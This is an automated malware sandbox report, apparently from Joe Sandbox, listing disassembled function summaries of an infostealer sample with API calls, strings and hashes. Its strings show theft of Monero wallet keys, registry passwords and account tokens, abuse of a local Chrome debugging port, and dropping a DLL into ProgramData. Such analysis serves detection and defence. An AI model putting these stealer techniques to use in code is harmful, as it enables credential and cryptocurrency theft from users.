                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: d8a08a3ca4b3125637a55d514dcde1bca2a40f0e01446c578e4b4aae04e52f62
                                    • Instruction ID: b572d938fc9d2d933781d33fab71d5d9fc8e591f470271f6687f852e70bdf270
                                    • Opcode Fuzzy Hash: d8a08a3ca4b3125637a55d514dcde1bca2a40f0e01446c578e4b4aae04e52f62
                                    • Instruction Fuzzy Hash: E65122B2D502199BCF15FB60DD96EED737CAB54300F4045E8B60A62092EE306B89DFA5
                                    Function 00C89A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenA.WININET(00CA0AF6,00000001,00000000,00000000,00000000), ref: 00C89A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00C89AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00C89AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: 8406dd5705d755b798d1832432f42f78fff67f332c4dbdfe52cba3a73970a6d6
                                    • Instruction ID: 714cf0c862bf18ba78c92a75665f2f3a3f495494d4352a79ee64d88d445c93a7
                                    • Opcode Fuzzy Hash: 8406dd5705d755b798d1832432f42f78fff67f332c4dbdfe52cba3a73970a6d6
                                    • Instruction Fuzzy Hash: B7413C35A10258AFCB24EFA4DC95FED7778FB48744F204198F509AB190CBB0AE84DB64
                                    Function 00C87630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C87330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C8739A
                                      • Part of subcall function 00C87330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C87411
                                      • Part of subcall function 00C87330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C8746D
                                      • Part of subcall function 00C87330: GetProcessHeap.KERNEL32(00000000,?), ref: 00C874B2
                                      • Part of subcall function 00C87330: HeapFree.KERNEL32(00000000), ref: 00C874B9
                                    • lstrcat.KERNEL32(00000000,00CA192C), ref: 00C87666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C876A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 00C876BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C876EF
                                    • lstrcat.KERNEL32(00000000,00CA1934), ref: 00C87700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00C87733
                                    • lstrcat.KERNEL32(00000000,00CA1938), ref: 00C8774D
                                    • task.LIBCPMTD ref: 00C8775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: a5e26042903871bb1767862e179439ead2427936ec69a7584751730d2ee916c0
                                    • Instruction ID: e9105417fbc6458e0a37de99e31021a0b9a713b096dd53b7099641327fccb113
                                    • Opcode Fuzzy Hash: a5e26042903871bb1767862e179439ead2427936ec69a7584751730d2ee916c0
                                    • Instruction Fuzzy Hash: 0F316072904309DBDB04FBA0EC99DFF7379AB45306F504218F202636A1DF34A949EB94
                                    Function 00C98290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0152DD58,00000000,?,00CA0E14,00000000,?,00000000), ref: 00C982C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C982C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00C982E8
                                    • __aulldiv.LIBCMT ref: 00C98302
                                    • __aulldiv.LIBCMT ref: 00C98310
                                    • wsprintfA.USER32 ref: 00C9833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2774356765-3474575989
                                    • Opcode ID: 9941e34ec3985e25c6cf787644011bcf6208b1d842d09fe7f521d7b3574ba62a
                                    • Instruction ID: 97a506fd098bb1e88e65ae264e0509184f9e0609ebfbdc43de67bb2b7d19fa73
                                    • Opcode Fuzzy Hash: 9941e34ec3985e25c6cf787644011bcf6208b1d842d09fe7f521d7b3574ba62a
                                    • Instruction Fuzzy Hash: 3E2136B1E44308ABDB00DFD4DD4AFAEB7B8FB45B14F104519F215BB280C77869048BA4
                                    Function 00C860F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                      • Part of subcall function 00C84800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C84889
                                      • Part of subcall function 00C84800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C84899
                                    • InternetOpenA.WININET(00CA0DFB,00000001,00000000,00000000,00000000), ref: 00C8615F
                                    • StrCmpCA.SHLWAPI(?,0152E3C0), ref: 00C86197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00C861DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00C86203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00C8622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00C8625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00C86299
                                    • InternetCloseHandle.WININET(?), ref: 00C862A3
                                    • InternetCloseHandle.WININET(00000000), ref: 00C862B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 9423e56d419184b674cd5fa313e83bdb58552dd7eab59b5aaa6fd8f16413f7fd
                                    • Instruction ID: 7d6dc23ff57d91c9dfaa44082b52571e1c966d61c20650623225eb8b50d850a3
                                    • Opcode Fuzzy Hash: 9423e56d419184b674cd5fa313e83bdb58552dd7eab59b5aaa6fd8f16413f7fd
                                    • Instruction Fuzzy Hash: DD5142B1A00318ABDF20EFA0DC49BEE7779AB44305F104198F605A71C1DB746B89DF99
                                    Function 00D0012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 00D0024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 00D0035B
                                    • CatchIt.LIBVCRUNTIME ref: 00D003AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 00D004C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: af384b6cb69cf5cf8cb6f078b4b7cab20ff9989a6c28c728400e81e33c730142
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: 52B18C71800209EFCF15DFA4C885BAEBBB5FF04314F18416AE9196B292D731DA51CBB6
                                    Function 00C87330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00C8739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00C87411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00C8746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00C874B2
                                    • HeapFree.KERNEL32(00000000), ref: 00C874B9
                                    • task.LIBCPMTD ref: 00C875B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 7b33db68cd4845baa2ee1e9caa476eee081ddaddedb5ce4bc60f1f8f03ea0235
                                    • Instruction ID: a09d1740f90656a9cf8cf3475a5438f57bda815705b3123cd9a6b49748614608
                                    • Opcode Fuzzy Hash: 7b33db68cd4845baa2ee1e9caa476eee081ddaddedb5ce4bc60f1f8f03ea0235
                                    • Instruction Fuzzy Hash: AE613DB180426C9BDB24EB50CC45BDAB7B8BF44304F1081E9E649A6141EF70ABC9DFA4
                                    Function 00C8BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9AC30: lstrcpy.KERNEL32(00000000,?), ref: 00C9AC82
                                      • Part of subcall function 00C9AC30: lstrcat.KERNEL32(00000000), ref: 00C9AC92
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    • lstrlen.KERNEL32(00000000), ref: 00C8BC6F
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00C8BC9D
                                    • lstrlen.KERNEL32(00000000), ref: 00C8BD75
                                    • lstrlen.KERNEL32(00000000), ref: 00C8BD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: d878f889aed26e0279be7e53e0665c58a1cb5f851d331896b77e0a040f32abe5
                                    • Instruction ID: 5994d252ef87571ba929957556d0df3c4203673c56cc3bc2f479376037bc8deb
                                    • Opcode Fuzzy Hash: d878f889aed26e0279be7e53e0665c58a1cb5f851d331896b77e0a040f32abe5
                                    • Instruction Fuzzy Hash: 99B15072910208ABCF04FBA0DDAAEEE7379AF14305F404569F50667191EF346F48DBA2
                                    Function 00C96A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 4b7231116256f8c647a167ed1c6b070f65acd3c7bf0fd67f042bf5da8e441898
                                    • Instruction ID: 4ad337c0d6a6c3cd65a3b42bfd2ea3449ac68c9fbc05411f57e981ee728209f9
                                    • Opcode Fuzzy Hash: 4b7231116256f8c647a167ed1c6b070f65acd3c7bf0fd67f042bf5da8e441898
                                    • Instruction Fuzzy Hash: DBF0D431948349EFD744AFE0B90979CBB74AB04B07F114199E71A961D0CE705A90ABA1
                                    Function 00C908A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C99850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00C908DC,C:\ProgramData\chrome.dll), ref: 00C99871
                                      • Part of subcall function 00C8A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00C8A098
                                    • StrCmpCA.SHLWAPI(00000000,01528950), ref: 00C90922
                                    • StrCmpCA.SHLWAPI(00000000,015288C0), ref: 00C90B79
                                    • StrCmpCA.SHLWAPI(00000000,01528870), ref: 00C90A0C
                                      • Part of subcall function 00C9AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00C9AAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00C90C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 00C90C30
